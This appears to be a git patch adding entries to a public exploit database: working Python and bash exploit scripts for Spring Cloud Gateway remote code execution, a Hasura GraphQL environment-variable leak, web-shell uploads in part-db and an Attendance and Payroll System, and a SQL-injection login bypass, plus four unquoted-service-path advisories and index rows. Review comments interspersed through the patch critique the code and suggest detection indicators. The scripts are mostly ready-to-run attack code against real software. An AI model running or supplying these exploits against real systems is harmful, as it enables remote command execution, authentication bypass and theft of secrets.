From e8863e001fe16daedd63cacc45b56edce2e82d1b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 8 Mar 2022 05:01:37 +0000
Subject: [PATCH] DB: 2022-03-08
9 changes to exploits/shellcodes
Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
Cloudflare WARP 1.4 - Unquoted Service Path
Malwarebytes 4.5 - Unquoted Service Path
Foxit PDF Reader 11.0 - Unquoted Service Path
Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)
part-db 0.5.11 - Remote Code Execution (RCE)
Attendance and Payroll System v1.0 - Remote Code Execution (RCE)
Attendance and Payroll System v1.0 - SQLi Authentication Bypass
Hasura GraphQL 2.2.0 - Information Disclosure
---
 exploits/java/webapps/50799.py | 87 +++++++++++++++++++++++++
 exploits/multiple/webapps/50803.py | 47 ++++++++++++++
 exploits/php/webapps/50800.sh | 21 ++++++
 exploits/php/webapps/50801.py | 101 +++++++++++++++++++++++++++++
 exploits/php/webapps/50802.py | 45 +++++++++++++
 exploits/windows/local/50804.txt | 36 ++++++++++
 exploits/windows/local/50805.txt | 25 +++++++
 exploits/windows/local/50806.txt | 28 ++++++++
 exploits/windows/local/50807.txt | 26 ++++++++
 files_exploits.csv | 9 +++
 10 files changed, 425 insertions(+)
 create mode 100755 exploits/java/webapps/50799.py
 create mode 100755 exploits/multiple/webapps/50803.py
 create mode 100755 exploits/php/webapps/50800.sh
 create mode 100755 exploits/php/webapps/50801.py
 create mode 100755 exploits/php/webapps/50802.py
 create mode 100644 exploits/windows/local/50804.txt
 create mode 100644 exploits/windows/local/50805.txt
 create mode 100644 exploits/windows/local/50806.txt
 create mode 100644 exploits/windows/local/50807.txt
diff --git a/exploits/java/webapps/50799.py b/exploits/java/webapps/50799.py
new file mode 100755
index 000000000..08b62ee26
--- /dev/null
+++ b/exploits/java/webapps/50799.py
@@ -0,0 +1,87 @@ +# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) +# Google Dork: N/A +# Date: 03/03/2022 +# Exploit Author: Carlos E. Vieira +# Vendor Homepage: https://spring.io/ +# Software Link: https://spring.io/projects/spring-cloud-gateway +# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1 +# Tested on: 3.1.0 +# CVE : CVE-2022-22947 + +import random +import string +import requests +import json +import sys +import urllib.parse +import base64 + +headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} +proxies = { + 'http': 'http://172.29.32.1:8081', + 'https': 'http://172.29.32.1:8081', +} +id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) + +def exploit(url, command): + + payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} + + commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8') + + rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False) + if(rbase.status_code == 201): + print("[+] Stage deployed to /actuator/gateway/routes/"+id) + print("[+] Executing command...") + r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False) + if(r.status_code == 200): + print("[+] getting result...") + r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) + if(r.status_code == 200): + get_response = r.json() + clean(url, id) + return get_response['filters'][0].split("'")[1] + else: + print("[-] Error: Invalid response") + clean(url, id) + exit(1) 
+ else: + clean(url, id) + print("[-] Error executing command") + + +def clean(url, id): + remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) + if(remove.status_code == 200): + print("[+] Stage removed!") + else: + print("[-] Error: Fail to remove stage") + +def banner(): + print(""" + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + """) + +def main(): + banner() + if len(sys.argv) != 3: + print("[-] Error: Invalid arguments") + print("[-] Usage: python3 exploit.py ") + exit(1) + else: + url = sys.argv[1] + command = sys.argv[2] + print(exploit(url, command)) +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/50803.py b/exploits/multiple/webapps/50803.py new file mode 100755 index 000000000..8cee83383 --- /dev/null +++ b/exploits/multiple/webapps/50803.py 
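Review bot: `exploit()` terminates the process with `exit(1)` on one failure path and falls through returning `None` on the other (the `else:` at the top of this hunk, whose matching `if` cannot be recovered because the indentation was lost), so `main()` either dies inside the helper or prints `None`; raising from `exploit()` and handling the error in `main()` would keep control flow in one place. `commandb64` and the `urllib.parse` import are never used, the module-level `id` shadows the builtin, and the `proxies` dict is left pointing at a private test address that every request is passed through. The header states the fixed threshold only as `< 3.0.7 & < 3.1.1`; a defender triaging this wants it spelled out, e.g. `# Fixed in: Spring Cloud Gateway 3.0.7 / 3.1.1 (see the CVE-2022-22947 advisory)`. The script's entire footprint is the actuator API — `POST` and `DELETE` on `/actuator/gateway/routes/<id>` with an 8-character lowercase id and `POST /actuator/gateway/refresh` — which is worth recording in the header as the observable indicators for logging and alerting.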
@@ -0,0 +1,47 @@
+# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
+# Software: Hasura GraphQL Community
+# Software Link: https://github.com/hasura/graphql-engine
+# Version: 2.2.0
+# Exploit Author: Dolev Farhi
+# Date: 5/05/2022
+# Tested on: Ubuntu
+
+import requests
+
+SERVER_ADDR = 'x.x.x.x'
+
+url = 'http://{}/v1/metadata'.format(SERVER_ADDR)
+
+print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')
+
+while True:
+ env_var = input('Type environment variable key to leak.\n> ')
+ if not env_var:
+ continue
+
+ payload = {
+ "type": "bulk",
+ "source": "",
+ "args": [
+ {
+ "type": "add_remote_schema",
+ "args": {
+ "name": "ttt",
+ "definition": {
+ "timeout_seconds": 60,
+ "forward_client_headers": False,
+ "headers": [],
+ "url_from_env": env_var
+ },
+ "comment": ""
+ }
+ }
+ ],
+ "resource_version": 2
+}
+ r = requests.post(url, json=payload)
+ try:
+ print(r.json()['error'].split('not a valid URI:')[1])
+ except IndexError:
+ print('Could not parse out VAR, dumping error as is')
+ print(r.json().get('error', 'N/A'))
\ No newline at end of file
diff --git a/exploits/php/webapps/50800.sh b/exploits/php/webapps/50800.sh
new file mode 100755
index 000000000..0a3a9858e
--- /dev/null
+++ b/exploits/php/webapps/50800.sh
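Review bot: `r.json()['error']` inside the loop is guarded only against `IndexError`, so a non-JSON reply (a JSON decode error from `r.json()`) or a response without an `error` key (`KeyError`) escapes the `try` and aborts the loop; reading `r.json().get('error', '')` before the split and catching the decode error would make the failure path honest. The `# Date: 5/05/2022` header post-dates the commit (2022-03-08) and is presumably a typo for March. The header also does not say whether a later release addresses the issue or what the observable looks like; from the code, the indicator is a `POST /v1/metadata` carrying `add_remote_schema` with `url_from_env`, answered by an error containing `not a valid URI:` that echoes the variable's value, so a `# Detection:` line naming that request/response pair and a `# Fixed in:` line (checked against the vendor changelog) would help a reader triage it.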
@@ -0,0 +1,21 @@ +# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE) +# Google Dork: NA +# Date: 03/04/2022 +# Exploit Author: Sunny Mehra @DSKMehra +# Vendor Homepage: https://github.com/part-db/part-db +# Software Link: https://github.com/part-db/part-db +# Version: [ 0.5.11.] +# Tested on: [KALI OS] +# CVE : CVE-2022-0848 +# +--------------- + +#!/bin/bash +host=127.0.0.1/Part-DB-0.5.10 #WEBHOST +#Usage: Change host +#Command: bash exploit.sh +#EXPLOIT BY @DSKMehra +echo "">POC.phtml #PHP Shell Code +result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > > Attendance and Payroll System v1.0') + print(' >> Unauthenticated Remote Code Execution') + print(' >> By pr0z\n') + + def info(self, message): + print(f"[{self.white}*{self.end}] {message}") + + def warning(self, message): + print(f"[{self.yellow}!{self.end}] {message}") + + def error(self, message): + print(f"[{self.red}x{self.end}] {message}") + + def success(self, message): + print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}") + + +upload_path = '/apsystem/admin/employee_edit_photo.php' +shell_path = '/apsystem/images/shell.php' +#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} + +shell_data = "" + +multipart_form_data = { + 'id': 1, + 'upload': (''), +} + +files = {'photo': ('shell.php', shell_data)} + +output = Interface() +output.header() + +# Check for arguments +if len(sys.argv) < 2 or '-h' in sys.argv: + output.info("Usage: python3 rce.py http://127.0.0.1") + sys.exit() + +# Upload the shell +target = sys.argv[1] +output.info(f"Uploading the web shell to {target}") +r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False) + +# Validating shell has been uploaded +output.info(f"Validating the shell has been uploaded to {target}") +r = requests.get(target + shell_path, verify=False) +try: + r = requests.get(target + shell_path) 
+ if r.status_code == 200: + output.success('Successfully connected to web shell\n') + else: + raise Exception +except ConnectionError: + output.error('We were unable to establish a connection') + sys.exit() +except: + output.error('Something unexpected happened') + sys.exit() + +# Remote code execution +while True: + try: + cmd = input("\033[91mRCE\033[0m > ") + if cmd == 'exit': + raise KeyboardInterrupt + r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False) + if r.status_code == 200: + print(r.text) + else: + raise Exception + except KeyboardInterrupt: + sys.exit() + except ConnectionError: + output.error('We lost our connection to the web shell') + sys.exit() + except: + output.error('Something unexpected happened') + sys.exit() \ No newline at end of file diff --git a/exploits/php/webapps/50802.py b/exploits/php/webapps/50802.py new file mode 100755 index 000000000..891cd6f25 --- /dev/null +++ b/exploits/php/webapps/50802.py 
@@ -0,0 +1,45 @@ +# Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass +# Date: 04/03/2022 +# Exploit Author: pr0z +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip +# Version: v1.0 +# Tested on: Linux, MySQL, Apache + +import requests +import sys +from requests.exceptions import ConnectionError + + +print('\n >> Attendance and Payroll System v1.0') +print(' >> Authentication Bypass through SQL injection') +print(' >> By pr0z\n') + +login_path = '/apsystem/admin/login.php' +index_path = '/apsystem/admin/index.php' + +payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login=" +headers = {'Content-Type': 'application/x-www-form-urlencoded'} +#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} + + +# Check for arguments +if len(sys.argv) < 2 or '-h' in sys.argv: + print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1") + sys.exit() + +# Bypass Authentication +target = sys.argv[1] +print("[+] Extracting Administrator cookie using SQLi ...") +sess = requests.Session() +try: + sess.get(target + index_path,headers=headers, verify=False) + sess.post(target + login_path, data=payload, headers=headers,verify=False) +except ConnectionError: + print('[-] We were unable to establish a connection') + sys.exit() + +cookie_val = sess.cookies.get_dict().get("PHPSESSID") + +print("[+] Use the following cookie:\n") +print(f"PHPSESSID: {cookie_val}") \ No newline at end of file diff --git a/exploits/windows/local/50804.txt b/exploits/windows/local/50804.txt new file mode 100644 index 000000000..a0b414036 --- /dev/null +++ b/exploits/windows/local/50804.txt 
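Review bot: The script prints `[+] Use the following cookie` and the `PHPSESSID` value unconditionally — the response of `sess.post()` is never inspected for status, redirect or body — so a patched or differently configured target produces the same "success" output with a session that was never authenticated; checking the login response before printing would remove the false positive. The root cause visible in `payload` is that the `username` form field reaches the admin login query unparameterized and the `UNION SELECT` supplies an entire fake admin row (including a bcrypt hash); that is the detail a defender fixing `admin/login.php` needs in the header, e.g. `# Fix: use prepared statements for the login query; log/alert on UNION SELECT in login POST bodies`. `headers` with the form content type is also sent on the `GET` to `index.php`, where it is meaningless — harmless, but worth dropping.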
@@ -0,0 +1,36 @@
+# Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
+# Date: 04/03/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.privateinternetaccess.com
+# Software Link: https://www.privateinternetaccess.com/download
+# Version: 3.3.0.100
+# Tested: Windows 10 x64
+# Contact: https://twitter.com/dmaral3noz
+
+# Step to discover Unquoted Service Path:
+
+C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname
+
+DisplayName Name PathName StartMode StartName
+Private Internet Access Service PrivateInternetAccessService "C:\Program Files\Private Internet Access\pia-service.exe" Auto LocalSystem
+
+# Service info:
+
+C:\Users\saudh>sc qc PrivateInternetAccessService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: PrivateInternetAccessService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files\Private Internet Access\pia-service.exe"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Private Internet Access Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/50805.txt b/exploits/windows/local/50805.txt
new file mode 100644
index 000000000..f270daa1b
--- /dev/null
+++ b/exploits/windows/local/50805.txt
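Review bot: The evidence in this advisory contradicts its title: both the `wmic` output and `BINARY_PATH_NAME : "C:\Program Files\Private Internet Access\pia-service.exe"` show the service path already wrapped in quotes, so the path is not unquoted and the service-path parsing ambiguity this class of finding relies on does not apply. Either the quotes were added in transcription, in which case the raw `sc qc` output should be pasted verbatim, or the finding is a false positive and should be withdrawn. A defender triaging this entry should treat it as unverified until an unquoted `BINARY_PATH_NAME` is shown.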
@@ -0,0 +1,25 @@
+# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path
+# Date: 05/03/2022
+# Exploit Author: Hejap Zairy
+# Vendor Homepage: https://www.cloudflare.com/
+# Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/
+# Version: 1.4.107
+# Tested: Windows 10 Pro x64 es
+
+C:\Users\Hejap>sc qc CloudflareWARP
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: CloudflareWARP
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Cloudflare WARP
+ DEPENDENCIES : wlansvc
+ SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/50806.txt b/exploits/windows/local/50806.txt
new file mode 100644
index 000000000..472ffc4e8
--- /dev/null
+++ b/exploits/windows/local/50806.txt
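Review bot: The `#Exploit:` paragraph here (and the identical one in 50806.txt and 50807.txt) says success requires placing code on the service's path but omits the check that decides whether the finding is exploitable at all: on a default installation `C:\Program Files` and its vendor subfolders are not writable by standard users, so an unquoted path only becomes a privilege-escalation issue when the ACL on the drive root or one of the intermediate folders has been loosened. Each advisory should include the permission evidence (an `icacls` listing of the directories on the path) or state explicitly that it was not verified, so defenders can rank these as hardening findings rather than confirmed local privilege escalation. The doubled backslash in `Cloudflare WARP\\warp-svc.exe` also looks like a transcription artifact and should be checked against the raw `sc qc` output.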
@@ -0,0 +1,28 @@
+# Exploit Title: Malwarebytes 4.5 - Unquoted Service Path
+# Date: 05/03/2022
+# Exploit Author: Hejap Zairy
+# Vendor Homepage: https://www.malwarebytes.com/
+# Software Link: https://www.malwarebytes.com/mwb-download/
+# Version: 4.5.0
+# Tested: Windows 10 Pro x64 es
+
+C:\Users\Hejap>sc qc MBAMService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: MBAMService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Malwarebytes Service
+ DEPENDENCIES : RPCSS
+ : WINMGMT
+ SERVICE_START_NAME : LocalSystem
+
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/50807.txt b/exploits/windows/local/50807.txt
new file mode 100644
index 000000000..823c9b918
--- /dev/null
+++ b/exploits/windows/local/50807.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Foxit PDF Reader 11.0 - Unquoted Service Path
+# Date: 05/03/2022
+# Exploit Author: Hejap Zairy
+# Vendor Homepage: https://www.foxit.com/pdf-reader/
+# Software Link: https://www.foxit.com/downloads/#Foxit-Reader/
+# Version: 11.0.1.49938
+# Tested: Windows 10 Pro x64 es
+
+C:\Users\Hejap>sc qc FoxitReaderUpdateService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: FoxitReaderUpdateService
+ TYPE : 110 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Foxit PDF Reader Update Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8dfd726eb..beccbf3d5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11457,6 +11457,10 @@ id,file,description,date,author,type,platform,port
 50789,exploits/windows/local/50789.py,"Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows,
 50790,exploits/windows/local/50790.py,"Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows,
 50791,exploits/windows/local/50791.txt,"Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
+50804,exploits/windows/local/50804.txt,"Private Internet Access 3.3 - 'pia-service' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
+50805,exploits/windows/local/50805.txt,"Cloudflare WARP 1.4 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
+50806,exploits/windows/local/50806.txt,"Malwarebytes 4.5 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
+50807,exploits/windows/local/50807.txt,"Foxit PDF Reader 11.0 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44868,3 +44872,8 @@ id,file,description,date,author,type,platform,port
 50794,exploits/php/webapps/50794.py,"Xerte 3.10.3 - Directory Traversal (Authenticated)",1970-01-01,"Rik Lutz",webapps,php,
 50795,exploits/php/webapps/50795.py,"Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Rik Lutz",webapps,php,
 50797,exploits/multiple/webapps/50797.txt,"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,multiple,
+50799,exploits/java/webapps/50799.py,"Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)",1970-01-01,"Carlos E. Vieira",webapps,java,
+50800,exploits/php/webapps/50800.sh,"part-db 0.5.11 - Remote Code Execution (RCE)",1970-01-01,"Chetanya Sharma",webapps,php,
+50801,exploits/php/webapps/50801.py,"Attendance and Payroll System v1.0 - Remote Code Execution (RCE)",1970-01-01,pr0z,webapps,php,
+50802,exploits/php/webapps/50802.py,"Attendance and Payroll System v1.0 - SQLi Authentication Bypass",1970-01-01,pr0z,webapps,php,
+50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple,
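Review bot: The author recorded for 50800 in this hunk (`"Chetanya Sharma"`) does not match the `# Exploit Author: Sunny Mehra @DSKMehra` header of `exploits/php/webapps/50800.sh` added in the same commit; one of the two should be corrected so attribution stays consistent between the index and the file. The 50805–50807 rows in the earlier hunk use `"Hejap Zairy Al-Sharif"` where the corresponding files say `Hejap Zairy` — a longer form of the same name, but the same consistency rule applies and the index should carry the form the file author used.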